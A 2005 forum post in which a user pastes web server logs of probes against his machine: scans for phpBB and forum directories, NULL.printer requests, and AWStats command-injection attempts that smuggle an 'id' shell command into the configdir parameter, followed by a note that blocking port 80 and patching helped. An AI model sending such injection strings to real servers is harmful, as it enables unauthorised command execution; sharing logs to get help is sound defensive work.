    2005-05-23 06:56:45 201.7.175.11 - 10.0.0.2 80 GET /boards/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:45 201.7.175.11 - 10.0.0.2 80 GET /phpBB2/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:49 201.7.175.11 - 10.0.0.2 80 GET /msgboard/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:53 201.7.175.11 - 10.0.0.2 80 GET /foros/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:53 201.7.175.11 - 10.0.0.2 80 GET /portal/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:56:57 201.7.175.11 - 10.0.0.2 80 GET /chat/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:00 201.7.175.11 - 10.0.0.2 80 GET /phpBB1/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:03 201.7.175.11 - 10.0.0.2 80 GET /phpBB3/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:03 201.7.175.11 - 10.0.0.2 80 GET /phpBB4/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:07 201.7.175.11 - 10.0.0.2 80 GET /phpBB5/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:07 201.7.175.11 - 10.0.0.2 80 GET /forum1/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:16 201.7.175.11 - 10.0.0.2 80 GET /forum2/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:16 201.7.175.11 - 10.0.0.2 80 GET /forum4/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:20 201.7.175.11 - 10.0.0.2 80 GET /forum3/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:24 201.7.175.11 - 10.0.0.2 80 GET /foros/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:24 201.7.175.11 - 10.0.0.2 80 GET /msgboard/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:29 201.7.175.11 - 10.0.0.2 80 GET /boards/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:29 201.7.175.11 - 10.0.0.2 80 GET /comunity/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:30 201.7.175.11 - 10.0.0.2 80 GET /portal/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:34 201.7.175.11 - 10.0.0.2 80 GET /discussion/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:34 201.7.175.11 - 10.0.0.2 80 GET /education/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:36 201.7.175.11 - 10.0.0.2 80 GET /html/forum/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:40 201.7.175.11 - 10.0.0.2 80 GET /html/forums/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:40 201.7.175.11 - 10.0.0.2 80 GET /Forum/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:41 201.7.175.11 - 10.0.0.2 80 GET /Forums/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:41 201.7.175.11 - 10.0.0.2 80 GET /bb/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:45 201.7.175.11 - 10.0.0.2 80 GET /ugboard/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:45 201.7.175.11 - 10.0.0.2 80 GET /ugboards/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:53 201.7.175.11 - 10.0.0.2 80 GET /newboard/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:57 201.7.175.11 - 10.0.0.2 80 GET /newboards/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:57 201.7.175.11 - 10.0.0.2 80 GET /members/phpBB/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:58 201.7.175.11 - 10.0.0.2 80 GET /members/phpBB2/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:57:58 201.7.175.11 - 10.0.0.2 80 GET /members/phpbb/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:58:03 201.7.175.11 - 10.0.0.2 80 GET /portal/forum/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 06:58:03 201.7.175.11 - 10.0.0.2 80 GET /portal/forums/ - 404
    Mozilla/4.0+(compatible;+MSIE+5.01;+Windows+NT+5.0;+.NET+CLR+1.0.3705)
    2005-05-23 13:44:07 67.104.84.66 - 10.0.0.2 80 GET /NULL.printer - 501 -
    2005-05-23 13:44:07 67.104.84.66 - 10.0.0.2 80 GET /NULL.printer - 501 -

    2005-05-24 09:34:03 218.2.240.36 - 10.0.0.2 80 GET
    /x/maxwell/cgi-bin/prxjdg.cgi - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)

    2005-05-27 07:35:32 68.55.175.241 - 10.0.0.2 80 GET
    /cgi-bin/awstats/awstats.pl configdir=|%20id%20| 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 07:35:34 68.55.175.241 - 10.0.0.2 80 GET /cgi-bin/awstats.pl
    configdir=|%20id%20| 404 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 07:35:36 68.55.175.241 - 10.0.0.2 80 GET /cgi/awstats.pl
    configdir=|%20id%20| 404 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 07:35:38 68.55.175.241 - 10.0.0.2 80 GET /iisstart.asp - 200
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:31 62.128.195.149 - 10.0.0.2 80 GET
    /cgi-bin/awstats/awstats.pl - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:31 62.128.195.149 - 10.0.0.2 80 GET /cgi-bin/awstats.pl -
    404 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:32 62.128.195.149 - 10.0.0.2 80 GET /cgi/awstats.pl - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:32 62.128.195.149 - 10.0.0.2 80 GET /awstats/awstats.pl -
    404 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:33 62.128.195.149 - 10.0.0.2 80 GET
    /cgi-bin/stats/awstats.pl - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:33 62.128.195.149 - 10.0.0.2 80 GET /stats/awstats.pl - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:35 62.128.195.149 - 10.0.0.2 80 GET /awstats.pl - 404
    Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)
    2005-05-27 23:03:35 62.128.195.149 - 10.0.0.2 80 GET /cgi/stats/awstats.pl -
    404 Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98)

     
    Fredly, Jun 4, 2005
    #13
  14. Fredly

    Fredly Guest

    So far so good since blocking port 80 and running patches...
     
    Fredly, Jun 7, 2005
    #14
    1. Advertisements

Ask a Question

Want to reply to this thread or ask your own question?

You'll need to choose a username for the site, which only take a couple of moments (here). After that, you can post your question and our members will help you out.